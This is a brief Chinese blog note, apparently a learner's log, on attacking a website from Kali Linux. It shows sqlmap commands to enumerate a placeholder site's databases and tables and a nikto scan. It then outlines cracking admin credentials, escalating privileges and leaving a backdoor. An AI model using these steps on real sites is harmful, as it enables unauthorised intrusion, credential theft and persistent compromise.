2016-03-21 kali下学习寻找漏洞和攻击测试

使用 sqlmap 扫描某网站网址,寻找潜在漏洞,可进行注入攻击。

1 sqlmap -u http://www.xxxxx.com   --dbs --current-user
2 sqlmap -u http://www.xxxxx.com     --tables

 找到可注入漏洞后,破解数据库表的用户名,暴力破解密码,找到adminiter账户,用nikto寻找网站入口。

1 nikto -host  www.xxxx.com

之后逐个分析url,分析网页源代码,找到入口。之后提升权限,留下后门。

你可能感兴趣的:(2016-03-21 kali下学习寻找漏洞和攻击测试)